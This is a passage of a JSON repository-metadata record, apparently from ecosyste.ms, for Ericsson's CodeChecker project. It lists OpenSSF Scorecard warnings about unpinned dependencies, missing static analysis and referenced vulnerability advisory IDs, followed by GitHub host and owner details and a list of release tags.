https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:51: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/docker.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:64: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:68: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/snap.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:91: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:92: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:117: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:154: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:199: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:1: pin your Docker image by updating ubuntu:18.04 to ubuntu:18.04@sha256:152dc042452c496007f07ca9127571cb9c29697f42acbfad72324b2bb2e43c98","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:1: pin your Docker image by updating ubuntu:16.04 to ubuntu:16.04@sha256:1f1a2d56de1d604801a9671f301190704c25d604a416f59e03c04f5c6ffee0d6","Warn: containerImage not pinned by hash: docker/thrift/Dockerfile.thrift.noble:1: pin your Docker image by updating ubuntu:24.04 to ubuntu:24.04@sha256:a08e551cb33850e4740772b38217fc1796a66da2506d312abe51acda354ff061","Warn: containerImage not pinned by hash: web/docker/Dockerfile:5","Warn: containerImage not pinned by hash: web/docker/Dockerfile:43: pin your Docker image by updating python:3.10.16-slim-bullseye to python:3.10.16-slim-bullseye@sha256:c758f6d42a79466e943350a2c5273a09767bddc16a81d381ed21675a382205ee","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: downloadThenRun not pinned by hash: web/docker/Dockerfile:16-23","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:24","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:22","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:103","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:104","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:51","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:64","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:70","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:77","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:125","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:177","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:217","Info:   0 out of  28 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   6 third-party GitHubAction dependencies pinned","Info:   0 out of   5 containerImage dependencies pinned","Info:   0 out of  24 pipCommand dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"24 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-9hjg-9r4m-mvj7","Warn: Project is vulnerable to: GHSA-3ww4-gg4f-jr7f","Warn: Project is vulnerable to: PYSEC-2024-225 / GHSA-6vqw-3v5j-54x4","Warn: Project is vulnerable to: GHSA-9v9h-cgj8-h64p","Warn: Project is vulnerable to: GHSA-h4gh-qq45-vh27","Warn: Project is vulnerable to: PYSEC-2023-254 / GHSA-jfhm-5ghh-2f97","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-2j2x-2gpw-g8fm","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-2p57-rm9w-gvfp","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-7fh5-64p2-3v2j","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-cchq-frgv-rjh5","Warn: Project is vulnerable to: GHSA-g644-9gfx-q4q4","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-14T22:53:38.249Z","repository_id":37431651,"created_at":"2025-08-14T22:53:38.249Z","updated_at":"2025-08-14T22:53:38.249Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271198843,"owners_count":24717130,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"Ericsson","name":"Ericsson","uuid":"4161311","kind":"organization","description":"Home for Ericsson's Open Source software","email":"opensource@ericsson.com","website":"http://www.ericsson.com","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/4161311?v=4","repositories_count":119,"last_synced_at":"2024-04-15T22:07:40.334Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/Ericsson","funding_links":[],"total_stars":4306,"followers":165,"following":0,"created_at":"2022-11-05T10:49:44.232Z","updated_at":"2024-04-15T22:07:56.651Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson/repositories"},"tags":[{"name":"v6.26.1","sha":"b7810134193a48f9ec33da861b1e308f7ed553b8","kind":"commit","published_at":"2025-07-10T17:42:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1/manifests"},{"name":"v6.26.0","sha":"0bbf351e870c7056cd9cc0dc44a795c0fe805dfa","kind":"commit","published_at":"2025-06-06T23:31:28.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0/manifests"},{"name":"v6.26.0-rc1","sha":"e0b9374245f88450d5b6dc4b164f78d9e2f06cfb","kind":"commit","published_at":"2025-04-28T09:21:09.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1/manifests"},{"name":"v6.25.1","sha":"c63dcdd8aa8dbd47360a0a02234c94e45107fb76","kind":"commit","published_at":"2025-03-12T13:44:01.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1/manifests"},{"name":"v6.25.0","sha":"d1ca304f33f4852275a612c05fc9fa102e34dcaa","kind":"commit","published_at":"2025-03-05T08:55:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0/manifests"},{"name":"v6.24.7","sha":"71f343577e0eea089e53b3bd78dfcb8867403cf3","kind":"commit","published_at":"2025-02-18T10:30:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7/manifests"},{"name":"v6.24.6","sha":"4ce6544bb734faa69fc00023b1477f416541933a","kind":"commit","published_at":"2025-02-17T15:00:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6/manifests"},{"name":"v6.24.5","sha":"5914f3a98336823c3a0a1061d84832ed88822469","kind":"commit","published_at":"2025-01-21T14:55:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5/manifests"},{"name":"v6.25.0-rc1","sha":"920d71089ac661d07670c8b9d5c2dd2cebcafcbd","kind":"commit","published_at":"2024-12-11T08:48:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1/manifests"},{"name":"v6.24.4","sha":"454d978191ed42c8202a2244dc092dfb6fd8c83a","kind":"commit","published_at":"2024-10-25T10:41:35.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4/manifests"},{"name":"v6.24.3","sha":"42074b5e3e3e8c166364b6a618b3795de60c6bbf","kind":"commit","published_at":"2024-10-18T13:35:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3/manifests"},{"name":"v6.24.2","sha":"ad41702e3108e4b92ae5d0143a5b961cc34195eb","kind":"commit","published_at":"2024-10-18T10:18:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2/manifests"},{"name":"v6.24.1","sha":"2cc6285dfd32b786e92239d4038dcdea3abfb63b","kind":"commit","published_at":"2024-09-13T09:33:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1/manifests"},{"name":"v6.24.0","sha":"ea795071d62637c69300f4528b6c46c75b2274bc","kind":"commit","published_at":"2024-06-12T12:29:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0/manifests"},{"name":"v6.24.0-rc1","sha":"f05a9bf97759b133f0729aaf12232c54b46b7c19","kind":"commit","published_at":"2024-04-18T06:33:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1/manifests"},{"name":"v6.23.1","sha":"2a8fa6e711a4ff591280a79fe8798dee2507d984","kind":"commit","published_at":"2023-12-14T14:30:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1/manifests"},{"name":"v6.23.0","sha":"bea15d4fb77478860dee41f6e7f206050720869a","kind":"commit","published_at":"2023-12-08T18:46:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0/manifests"},{"name":"v6.23.0-rc2","sha":"605ba1b9db6ed067c89a12f7055cc177b76f8ed6","kind":"commit","published_at":"2023-11-17T11:24:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2/manifests"},{"name":"v6.23.0-rc1","sha":"848e335ff33e49db1905331424c268d423feb7fc","kind":"commit","published_at":"2023-10-30T14:42:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1/manifests"},{"name":"v6.22.2","sha":"a3d35cfd509b995187288cd8631446415a334257","kind":"commit","published_at":"2023-07-13T14:47:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2/manifests"},{"name":"v6.22.1","sha":"8aabb4f715ed971f5ff9751b438e2ac00016e145","kind":"commit","published_at":"2023-04-19T13:23:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1/manifests"},{"name":"v6.22.0","sha":"ecf377637b86360c75508952b2e43fabac2aec6b","kind":"commit","published_at":"2023-04-14T13:22:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0/manifests"},{"name":"v6.22.0-rc1","sha":"6fc70f69b75ccbe46f537cc817b0cf07ba9c8cd9","kind":"commit","published_at":"2023-03-24T14:34:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1/manifests"},{"name":"v6.21.0","sha":"fe0ac5b291ed3cfef8fd8c6909501de55dabc20e","kind":"commit","published_at":"2022-11-09T17:22:05.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0/manifests"},{"name":"v6.20.0-hotfix5","sha":"e70c682f11af655d6b174a15d596ed913f1cb924","kind":"commit","published_at":"2022-11-04T13:36:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5/manifests"},{"name":"v6.20.0-hotfix4","sha":"cbefae31ba2a4b66944af401da05e85b858a290a","kind":"commit","published_at":"2022-11-03T17:44:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericss